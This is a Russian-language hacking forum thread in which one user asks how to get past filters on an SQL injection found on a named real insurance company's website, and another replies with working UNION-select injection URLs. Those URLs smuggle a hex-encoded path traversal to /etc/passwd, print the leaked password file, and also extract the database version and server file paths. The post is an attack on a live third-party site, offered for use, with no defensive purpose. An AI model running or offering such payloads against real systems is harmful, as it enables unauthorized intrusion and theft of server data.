13.06.2012, 10:24
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Grifon
обнаружил инъекцию по адресу http://www.azalsigorta.com/?mod=pages' но при попытке внедрения кода срабатывают фильтры как можно их обойти?
Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:
Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
Результат:
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
....
Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7061737377 64 это ../../../../../etc/passwd.
UPD.
Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
В самом низу
Код:
Fatal error: Class '5.5.23-55' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
Удачи!
|
|
|